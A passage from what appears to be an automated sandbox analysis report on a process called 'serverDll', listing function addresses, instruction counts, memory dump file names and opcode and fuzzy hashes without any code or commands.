                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d472133644c052564671d972f4ea6613c239b300b110542a27c091a309ec229f
                                                                                            • Instruction ID: 5da7eeda48652e9d3f4830c692db5a9592eb0ecd2446c002d4d9462b09553f55
                                                                                            • Opcode Fuzzy Hash: d472133644c052564671d972f4ea6613c239b300b110542a27c091a309ec229f
                                                                                            • Instruction Fuzzy Hash: 2681D370A0EB4ECFE37ADB58C5A457277E1FF04300B11557DC48AC7AA2DA2AB942CB41
                                                                                            Function 00007FFD9BE689C2 Relevance: .2, Instructions: 195COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b3ce5022f0200b7ef9865d954a4b0a8108cf1eb6c90787dce8def289be6c148
                                                                                            • Instruction ID: e9d9031be02959547e418436ac6b8de0d91b2779f1fc1d89ff69376b7865c475
                                                                                            • Opcode Fuzzy Hash: 3b3ce5022f0200b7ef9865d954a4b0a8108cf1eb6c90787dce8def289be6c148
                                                                                            • Instruction Fuzzy Hash: 23511871B1A94DCFE7A8DB5C886567433D5FF98314F0502BBE41EC72E2ED29A9018741
                                                                                            Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 160COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08551417555293ea2f23cb6901dc07abcf4593879e4083074378bca9be2e99f4
                                                                                            • Instruction ID: c53c2c8c31e0b12d91b5a32dc8284e0076620bf7dec01d62f33fa277adc6f6dc
                                                                                            • Opcode Fuzzy Hash: 08551417555293ea2f23cb6901dc07abcf4593879e4083074378bca9be2e99f4
                                                                                            • Instruction Fuzzy Hash: AD412716B0C9590AE318F7BC64B5AF97781EF9933AB0445BFE44DCB1D7CD18A8418294
                                                                                            Function 00007FFD9BE6BF70 Relevance: .1, Instructions: 128COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f2992f806e19014a96be8bc2f77e3d2e005b4ae2f25969f68857cc8869bd4673
                                                                                            • Instruction ID: f5b50a6f60dc26d96b49dfd7c4991c62309a9197f5f1073a2c4f1b614d2907ae
                                                                                            • Opcode Fuzzy Hash: f2992f806e19014a96be8bc2f77e3d2e005b4ae2f25969f68857cc8869bd4673
                                                                                            • Instruction Fuzzy Hash: B4411730E1D45ECEE7B8D6688471BB877A1FF54300F1541BAC08EC72A6DD3EAA848740
                                                                                            Function 00007FFD9BE6D247 Relevance: .1, Instructions: 127COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57dab1a5bf4475df6616ab43cd1f63b2c0af71ec2878b1780fa59aa26bfffa31
                                                                                            • Instruction ID: 163b7bed663871a8b9a8fb662f167178d2b185b593b9fea70e27d76e957cf012
                                                                                            • Opcode Fuzzy Hash: 57dab1a5bf4475df6616ab43cd1f63b2c0af71ec2878b1780fa59aa26bfffa31
                                                                                            • Instruction Fuzzy Hash: 7741733260D9488FDF98EF1CC465EA573E1FBA8325B0541AAD04AC72A2DE25F845CB81
                                                                                            Function 00007FFD9BE63C07 Relevance: .1, Instructions: 127COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70b8bd474124b3642344cc52cb8bc55cdf8ca99cf077d1503cee4f6198ff30d4
                                                                                            • Instruction ID: 3e065700c5f3fd1bf718571e0c52a58e8d9aa75d4a88fb6318284ba7a867f8a8
                                                                                            • Opcode Fuzzy Hash: 70b8bd474124b3642344cc52cb8bc55cdf8ca99cf077d1503cee4f6198ff30d4
                                                                                            • Instruction Fuzzy Hash: 04413E3170D9088FDF59EB2CC4A5DA5B7E1FF69320B0445AAE44EC7292DE35E845CB81
                                                                                            Function 00007FFD9BE6D2F1 Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a2fe7db09e9c1caf28e793fc151d58bb08eb29e74d0efae33ae0fa7e8c7615ed
                                                                                            • Instruction ID: 089fe89666d44766a2089b00e42b4f4e1d4450987a8363085c400caf62efab87
                                                                                            • Opcode Fuzzy Hash: a2fe7db09e9c1caf28e793fc151d58bb08eb29e74d0efae33ae0fa7e8c7615ed
                                                                                            • Instruction Fuzzy Hash: 44318F3160C9488FDF98EF1CC465E6573E1FFA9315B0542AED08AC72A2DE25F845CB81
                                                                                            Function 00007FFD9BE63CB1 Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5ad5a5d00a1a3fe925de69e2d78b19dbb2650c5f5475d981b57487b2a51cc8a4
                                                                                            • Instruction ID: 8524c31392464b9f3df0ffa0320c8c03e361f7c00d9910d1589dda61b7398587
                                                                                            • Opcode Fuzzy Hash: 5ad5a5d00a1a3fe925de69e2d78b19dbb2650c5f5475d981b57487b2a51cc8a4
                                                                                            • Instruction Fuzzy Hash: 6531603160C9488FDF59EF2CC4A5DA4B7E1FF6931070446AAD49AC7192DE35E845CB81
                                                                                            Function 00007FFD9BE63C4B Relevance: .1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6402ef44afb17dfcbadc5db5f7b462249fd063f4094ae3888906d833e6cd1a36
                                                                                            • Instruction ID: f28e47f71982371edc62e0977e65fd2ee5e9597fa906be22c4c822fcbf67e22c
                                                                                            • Opcode Fuzzy Hash: 6402ef44afb17dfcbadc5db5f7b462249fd063f4094ae3888906d833e6cd1a36
                                                                                            • Instruction Fuzzy Hash: D931703170C9098FDF58EF2CC4A5DA4B3E1FF6831070446AAE49AC7292DE35E885CB81
                                                                                            Function 00007FFD9BE6D28B Relevance: .1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76ac3db1609942383cf9a0a454338107c70ddbf1dac6dbe6e63f5c10add1ec6b
                                                                                            • Instruction ID: 68db304ad41363c2825164b67cc2a99fcda8154b7e80ba058d8acef12a3f2a47
                                                                                            • Opcode Fuzzy Hash: 76ac3db1609942383cf9a0a454338107c70ddbf1dac6dbe6e63f5c10add1ec6b
                                                                                            • Instruction Fuzzy Hash: 8C31733160D9498FDF98EF1CC465EA573E2FFA8315B0542AED04AC72A2DE25F845CB81
                                                                                            Function 00007FFD9BE6EA78 Relevance: .1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4c87f2f2fc623ed7c462f3e85bb2a829701006bc428143512964ab659bc5aef8
                                                                                            • Instruction ID: c90bbe41bc4dc76f32083540b1231602076186bcb733799735abbcc37003b9e2
                                                                                            • Opcode Fuzzy Hash: 4c87f2f2fc623ed7c462f3e85bb2a829701006bc428143512964ab659bc5aef8
                                                                                            • Instruction Fuzzy Hash: EE316A30A1E55E4AE778C69884B86F877A5FF62304F1586BEC04EC71A7CD3D7A818741
                                                                                            Function 00007FFD9BAA116D Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4afe937d77b35bb830f1051b764b54966d1f4fdc2c9071dbff4b04868714e7ee
                                                                                            • Instruction ID: 8c0ed205652760fd73076e3f785843f509add14a04ac340115adafa10f306772
                                                                                            • Opcode Fuzzy Hash: 4afe937d77b35bb830f1051b764b54966d1f4fdc2c9071dbff4b04868714e7ee
                                                                                            • Instruction Fuzzy Hash: 1B310931B0D64E5FDB55EBA8C8649B97BE1FF66310B0401BFC009C71A2DA68A541CB50
                                                                                            Function 00007FFD9BE687D3 Relevance: .1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 91b99513dbb32fd8e8a737f569e7e49dbca439830a743e4ddb1cfd8ea7bfec46
                                                                                            • Instruction ID: 4b5a0e17784bcb4c940c956e5f4d1500540f6434cee8441ffb7ffcdc3d9a0c72
                                                                                            • Opcode Fuzzy Hash: 91b99513dbb32fd8e8a737f569e7e49dbca439830a743e4ddb1cfd8ea7bfec46
                                                                                            • Instruction Fuzzy Hash: DA31AF31A1EA8DCFDBA9DBA8C8605EC7BB1FF59308F5501BBD049D71A2DE296905C700
                                                                                            Function 00007FFD9BE6D055 Relevance: .1, Instructions: 98COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf9cb4c05e7f0a64b9796bbb7a4aa9f24cd1d4244b6d615e7a6bb4ef5f67692c
                                                                                            • Instruction ID: a532abdb59ed57c5fd3582b01d29085d00b03f75c5aaeafa1294a6f9e8efb58c
                                                                                            • Opcode Fuzzy Hash: cf9cb4c05e7f0a64b9796bbb7a4aa9f24cd1d4244b6d615e7a6bb4ef5f67692c
                                                                                            • Instruction Fuzzy Hash: 70314F30E0E54ECFEBB8DB9484615BD7BB6FF44300F9181BAD01EC61A1DE3A6A418741
                                                                                            Function 00007FFD9BE63A15 Relevance: .1, Instructions: 98COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e95d3454088553159a190bcfae287811830df101653bed950cb003f8d7626317
                                                                                            • Instruction ID: 27f137a9823948a0b8becde9c1c6ac950c8a48e6f0d64761c8ae264b963100da
                                                                                            • Opcode Fuzzy Hash: e95d3454088553159a190bcfae287811830df101653bed950cb003f8d7626317
                                                                                            • Instruction Fuzzy Hash: D9313A30B1E54ECFEBAADB8C84A55BD7BB5FF44300F51017AD01ED62A1DB3A6A40A741
                                                                                            Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1a63d5ebfa5105350764c08978ab2060c07f10d57093f55251582cbb01f49bb
                                                                                            • Instruction ID: 2087f02d02e2ef8f7c00aae9f731c265d4b6cb0b4d65cbd261e53e42af591561
                                                                                            • Opcode Fuzzy Hash: e1a63d5ebfa5105350764c08978ab2060c07f10d57093f55251582cbb01f49bb
                                                                                            • Instruction Fuzzy Hash: FC316B32B0E24D4FE731ABA898612EC7BA1EF41365F0541B7D05CCB1D3D978268AC764
                                                                                            Function 00007FFD9BAA0998 Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8115e1f23ff082f32ccfe44472d8dc1c829ae016b2bc86756207e2549bc45424
                                                                                            • Instruction ID: 8f0566457232f8fc5c936cb1f8aecd877feb4e1e101a9459932ab7011ba4cb9f
                                                                                            • Opcode Fuzzy Hash: 8115e1f23ff082f32ccfe44472d8dc1c829ae016b2bc86756207e2549bc45424
                                                                                            • Instruction Fuzzy Hash: 47213421B1DA1D0FE798E76C447A6B977C2EF99320B5101BEE40EC33E7CD54AC028255
                                                                                            Function 00007FFD9BE6BF42 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e64a8019e20623f54d29c4860e1823093f15a137dc4037dce79220b4fcb601cc
                                                                                            • Instruction ID: e8facd15412b72dd2acb12b640dfa37e22b7ed2724abcc214ebf8dbfeacab91e
                                                                                            • Opcode Fuzzy Hash: e64a8019e20623f54d29c4860e1823093f15a137dc4037dce79220b4fcb601cc
                                                                                            • Instruction Fuzzy Hash: 84217B20A2E59ECEE37AC26848709B47B55FF52304B1A46F6D087CB1F7D81EA945D380
                                                                                            Function 00007FFD9BE6A2F9 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db6bb4d4dc0121fd5df0e63dc7c066644f0817314b6e4497ed07ea0de15cd730
                                                                                            • Instruction ID: e76397115c6468131947a60e6afb44a2872949495944eb0e10d54a427d42f8ca
                                                                                            • Opcode Fuzzy Hash: db6bb4d4dc0121fd5df0e63dc7c066644f0817314b6e4497ed07ea0de15cd730
                                                                                            • Instruction Fuzzy Hash: 5B216622F0E78D8FE7319AA48C655ED3BE4EF67310B0A01B7D448DB1A2ED682E058750
                                                                                            Function 00007FFD9BE62900 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 288755e3cd216e4850cd1ba259c1904ee86b78ad226d6ef65f12a4a6b682a647
                                                                                            • Instruction ID: b03339826dcc5a1c83da353d383dd0599a7b3997697187d550016c44bfa8eedc
                                                                                            • Opcode Fuzzy Hash: 288755e3cd216e4850cd1ba259c1904ee86b78ad226d6ef65f12a4a6b682a647
                                                                                            • Instruction Fuzzy Hash: EE310E20B1E5EECEE739839848755747B65FFD1311B1986BAD0EA8B0EBC82DB581C341
                                                                                            Function 00007FFD9BE60CA9 Relevance: .1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b571c2f0bac4786615447c4a38de70803e0a0dde02e48ccd4bf213bf4c9f41d6
                                                                                            • Instruction ID: 0e64ab6fc4a70c3a42a3c280b444fdd66ff7f21f49d6bb8bef40b4a435bdea5f
                                                                                            • Opcode Fuzzy Hash: b571c2f0bac4786615447c4a38de70803e0a0dde02e48ccd4bf213bf4c9f41d6
                                                                                            • Instruction Fuzzy Hash: E3217D31B0E79D8FD7719AA48CA55B93BE4EF53740B0601B7C049CB1E7DD582E058350
                                                                                            Function 00007FFD9BE607E3 Relevance: .1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 69f4e2c26a490d446e4a771c31ae0c1d36950ead8442ee803f6b69bba8a1c392
                                                                                            • Instruction ID: 5b4cf7b19120f77b6bb3fedf348796a0e4d05ee762ac54f3503ba57687be546e
                                                                                            • Opcode Fuzzy Hash: 69f4e2c26a490d446e4a771c31ae0c1d36950ead8442ee803f6b69bba8a1c392
                                                                                            • Instruction Fuzzy Hash: 8B21D331F1961D8FEBA8EB58D8A967873E5FF49315F0101BAD04EC35A7CE266D418B80
                                                                                            Function 00007FFD9BE67A28 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 98b6af688c2855bb9c5b0e81fa546a55f16b063833bc769d0d2158fa68ff52a7
                                                                                            • Instruction ID: 49e1e20a957de48b1e33da730c4481e7d8a8c8d5de4ca3b8d474da3fb19d5a30
                                                                                            • Opcode Fuzzy Hash: 98b6af688c2855bb9c5b0e81fa546a55f16b063833bc769d0d2158fa68ff52a7
                                                                                            • Instruction Fuzzy Hash: DA210862E0FF8ECFF3705AA448296797D99EF44300F15047BE85DC61B2EA2AAB409341
                                                                                            Function 00007FFD9BE60847 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 099750bc44b1e9e59a629eca278f54cd70a22f1fd60250ddb6f323dde11e6191
                                                                                            • Instruction ID: 0d89c58b1f021f3dc3d8ca9d6b8d9dc000687928588707deb524f60f1aa5de2d
                                                                                            • Opcode Fuzzy Hash: 099750bc44b1e9e59a629eca278f54cd70a22f1fd60250ddb6f323dde11e6191
                                                                                            • Instruction Fuzzy Hash: BF115170B08A1C8FDB98DB18D895AA8B3E1FF99315F1141BAD04ED76A6CE31AD418B41
                                                                                            Function 00007FFD9BE69369 Relevance: .1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 12529c43a39f9b3f63e51b380e15a57a07fc73b88bd14202e5dce5db27474ffa
                                                                                            • Instruction ID: 160471f7c3454d9f1585e62b92910952045b7118d4ebdc26ee798dec1eed7766
                                                                                            • Opcode Fuzzy Hash: 12529c43a39f9b3f63e51b380e15a57a07fc73b88bd14202e5dce5db27474ffa
                                                                                            • Instruction Fuzzy Hash: BD212A35E1950D9FDBACDB58C46AAADB7B1EF98311F0101BED00ED72A1CE35A9418B40
                                                                                            Function 00007FFD9BAA5C23 Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2ae736bd64a652b50f8ffaf875d6d432f5e08bc17929cb0037d918dba0fbea35
                                                                                            • Instruction ID: f38ab0014e85245086c842332e501afbcabee4c5974c4ffce8139f4a461857fe
                                                                                            • Opcode Fuzzy Hash: 2ae736bd64a652b50f8ffaf875d6d432f5e08bc17929cb0037d918dba0fbea35
                                                                                            • Instruction Fuzzy Hash: BF215A20B1560E4FEBB4EB94C8A87B872A2FF58701F5141B9D40DD72B6DEB86B808714
                                                                                            Function 00007FFD9BE62930 Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 16e48e1bd8f18f93479f9f9d60351c9fc1fbf3796036af77f26cd04881fa911c
                                                                                            • Instruction ID: 6f956914c6cb6a518007dfe952e6e7f524a35f698a52485751e6816c1e56407b
                                                                                            • Opcode Fuzzy Hash: 16e48e1bd8f18f93479f9f9d60351c9fc1fbf3796036af77f26cd04881fa911c
                                                                                            • Instruction Fuzzy Hash: 6B11BB20B1D46FCEE67C82C884755B47755FFD0311715867AD4EF8B5EAC829BA819380
                                                                                            Function 00007FFD9BE6EA98 Relevance: .1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5c51c40e4e8ba6a5f1f4157ca5fd80e71ee939547726c79cfafafc9aa677637
                                                                                            • Instruction ID: f633d06ebf4bba6854a2f3ed4b006ede1693f13cdad2142664445fbe11ca5448
                                                                                            • Opcode Fuzzy Hash: c5c51c40e4e8ba6a5f1f4157ca5fd80e71ee939547726c79cfafafc9aa677637
                                                                                            • Instruction Fuzzy Hash: DC119B32B0E74E4FEB759AA048685B83BE4DF16350F0601B6D409EB1B2DA652D448390
                                                                                            Function 00007FFD9BE6AFF0 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8bec3ed0d12e8589e31241cbaa3fc4a4b3d31686a814662a0a906e3e51b9d98e
                                                                                            • Instruction ID: 69b8d36043099ad96aa5ff0213456cd5fe77b1063c370dcb50210338781528a4
                                                                                            • Opcode Fuzzy Hash: 8bec3ed0d12e8589e31241cbaa3fc4a4b3d31686a814662a0a906e3e51b9d98e
                                                                                            • Instruction Fuzzy Hash: 9F112221F0AD0ECFEBA8AA6484628F937D4EF64354B00063AD41EC74E2CE29B6408390
                                                                                            Function 00007FFD9BE607EC Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
